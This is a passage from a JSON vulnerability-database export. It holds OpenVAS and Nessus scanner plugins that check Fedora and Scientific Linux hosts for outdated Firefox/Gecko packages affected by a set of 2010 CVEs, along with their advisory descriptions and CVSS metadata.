Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"mozvoikko\", rpm:\"mozvoikko~1.0~16.fc14.1\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:18:15", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050156.html"], "pluginID": "862508", "description": "Check for the Version of xulrunner", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Fedora Update for xulrunner FEDORA-2010-16885", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862508", "id": "OPENVAS:862508", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xulrunner on Fedora 12\";\ntag_insight = \"XULRunner provides the XUL Runtime environment for Gecko applications.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050156.html\");\n script_id(862508);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for xulrunner FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xulrunner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.1.15~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:11:14", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050157.html"], "pluginID": "862503", "description": "Check for the Version of perl-Gtk2-MozEmbed", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16885", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862503", "id": "OPENVAS:862503", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"perl-Gtk2-MozEmbed on Fedora 12\";\ntag_insight = \"This module allows you to use the Mozilla embedding widget from Perl.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050157.html\");\n script_id(862503);\n script_version(\"$Revision: 8068 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-11 07:31:34 +0100 (Mon, 11 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl-Gtk2-MozEmbed\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Gtk2-MozEmbed\", rpm:\"perl-Gtk2-MozEmbed~0.08~6.fc12.17\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:33:19", "references": ["2010-16897", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050079.html"], "pluginID": "862623", "description": "Check for the Version of gnome-python2-extras", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for gnome-python2-extras FEDORA-2010-16897", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862623", "id": "OPENVAS:862623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-python2-extras on Fedora 14\";\ntag_insight = \"The gnome-python-extra package contains the source packages for additional\n Python bindings for GNOME. It should be used together with gnome-python.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050079.html\");\n script_id(862623);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-python2-extras\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~25.fc14.1\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:05:34", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "2010-16897"], "pluginID": "1361412562310862660", "description": "Check for the Version of galeon", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "title": "Fedora Update for galeon FEDORA-2010-16897", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862660", "id": "OPENVAS:1361412562310862660", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for galeon FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"galeon on Fedora 14\";\ntag_insight = \"Galeon is a web browser built around Gecko (Mozilla's rendering\n engine) and Necko (Mozilla's networking engine). It's a GNOME web\n browser, designed to take advantage of as many GNOME technologies as\n makes sense. Galeon was written to do just one thing - browse the web.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862660\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for galeon FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of galeon\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"galeon\", rpm:\"galeon~2.0.7~35.fc14.1\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:20", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html"], "pluginID": "1361412562310862521", "description": "Check for the Version of galeon", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "type": "openvas", "title": "Fedora Update for galeon FEDORA-2010-16885", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862521", "id": "OPENVAS:1361412562310862521", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for galeon FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"galeon on Fedora 12\";\ntag_insight = \"Galeon is a web browser built around Gecko (Mozilla's rendering\n engine) and Necko (Mozilla's networking engine). It's a GNOME web\n browser, designed to take advantage of as many GNOME technologies as\n makes sense. Galeon was written to do just one thing - browse the web.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862521\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for galeon FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of galeon\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"galeon\", rpm:\"galeon~2.0.7~27.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:37:18", "references": ["http://www.nessus.org/u?2c2c32e5"], "pluginID": "60889", "description": "A race condition flaw was found in the way Firefox handled Document Object Model (DOM) element properties. Malicious HTML content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text into HTML. A malformed file name on a Gopher server could, when accessed by a victim running Firefox, allow arbitrary JavaScript to be executed in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could create a malicious web page that, when viewed by a victim, could steal private data from a different website the victim had loaded with Firefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Firefox, if that user ran Firefox from within an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 3.6.11 and 3.6.12.\n\nAfter installing the update, Firefox must be restarted for the changes to take effect.", "edition": 4, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : firefox on SL6.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2013-11-27T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101110_FIREFOX_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60889);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:06:04 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw was found in the way Firefox handled Document\nObject Model (DOM) element properties. Malicious HTML content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179,\nCVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted\ntext into HTML. A malformed file name on a Gopher server could, when\naccessed by a victim running Firefox, allow arbitrary JavaScript to be\nexecuted in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker\ncould create a malicious web page that, when viewed by a victim, could\nsteal private data from a different website the victim had loaded with\nFirefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Firefox, if that user ran Firefox from\nwithin an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.11 and 3.6.12.\n\nAfter installing the update, Firefox must be restarted for the changes\nto take effect.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=5908\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c2c32e5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected firefox, xulrunner and / or xulrunner-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-1.9.2.12-1.el6_0\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-devel-1.9.2.12-1.el6_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:13", "references": ["http://www.nessus.org/u?0f9a0937", "http://www.nessus.org/u?d414eb29", "https://bugzilla.redhat.com/show_bug.cgi?id=642286", "https://bugzilla.redhat.com/show_bug.cgi?id=642294", "https://bugzilla.redhat.com/show_bug.cgi?id=642275", "http://www.nessus.org/u?ebdf7518", "http://www.nessus.org/u?5e5101ce", "http://www.nessus.org/u?c2308b45", "https://bugzilla.redhat.com/show_bug.cgi?id=642277", "https://bugzilla.redhat.com/show_bug.cgi?id=642283", "http://www.nessus.org/u?8a7474ff", "https://bugzilla.redhat.com/show_bug.cgi?id=646997", "http://www.nessus.org/u?d6343bde", "http://www.nessus.org/u?3b69c90e", "http://www.nessus.org/u?1d35dfe9", 